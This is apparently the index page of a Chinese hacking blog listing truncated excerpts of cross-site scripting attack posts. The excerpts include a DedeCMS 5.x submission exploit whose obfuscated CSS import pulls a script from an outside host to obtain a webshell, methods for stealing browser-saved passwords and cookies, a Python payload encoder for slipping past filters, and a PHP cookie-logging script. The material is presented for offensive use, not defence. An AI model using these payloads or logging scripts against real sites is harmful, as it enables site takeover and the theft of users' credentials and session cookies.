dedecms xss 通杀所有版本 dede 5.6 dede 5.7 直接获取webshell

DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)   目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个: 开启注册 开启投稿 注册会员-发表文章投稿,内容如下填写: <style>@im\port'\http://webshe...

- 阅读全文 -

XSS获取用户明文密码

浏览器特性导致,firefox与chrome是默认这样的。IE8默认不会。其他的不关心不测试。 浏览器在用户登录时,会提示用户是否记住密码: 1、对于firefox,用户有三个选择:记住、不记录本站、暂不。 2、对于chorme,用户只有在输入正确密码登录成功后,才会出现提示:“想让谷歌浏览器保存您的密码吗?”,用户有两个选择:保存密码、此站一律不保存密码。 3、而当在“自动完成”设置里开启IE8...

- 阅读全文 -

XSS两三事(第一季)

Author:ShadowHider Email:s@xeye.us   这几天发现论坛里讨论XSS的帖子多了起来,刚好我以前也折腾过一阵子XSS,就斗胆来和大家交流分享下。   下面分享几个不算tips的tips,应该很多大牛在利用XSS时都注意到了,但我还是再写一下吧,帮大家做个备忘。:P   #1 使用img标签进行CSRF   之前瞌睡龙兄弟在htt...

- 阅读全文 -

XSS代码加密脚本

用来bypass一些检测规则或者条件限制 XSS加密还是很常见很常见的。 ''' Python XSS payload encoder Author: BGS (rstcenter.com) Contributor cmiN (rstcenter.com) Date: 13 August 2011 Version: Python 2.7 ''' #!/usr/bin/env python impo...

- 阅读全文 -

XSS偷取密码Cookies通用脚本

很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。 今天写个通用脚本工具 文件如下   asp.asp或者php.php 或者cookies.htm效果如下 保存文本   发送邮件   获取的cookies 截获用户名密码   主文件Get.asp用来获取发来的信息,并且保存到 TXT或者发送到邮箱 内容如下:使用方法: asp.asp是Asp中调用Get.asp的例子内容...

- 阅读全文 -

XSS截获网站后台路径脚本

cook.php <? $info = $_SERVER['QUSEY_STRING']; if ($info) { $fp = fopen("info.txt"."a"); fwrite($fp.$info."\n"); fclose($fp); } ?>   使用代码: 插入: <img name="ak" width=0 height=0 border=0>...

- 阅读全文 -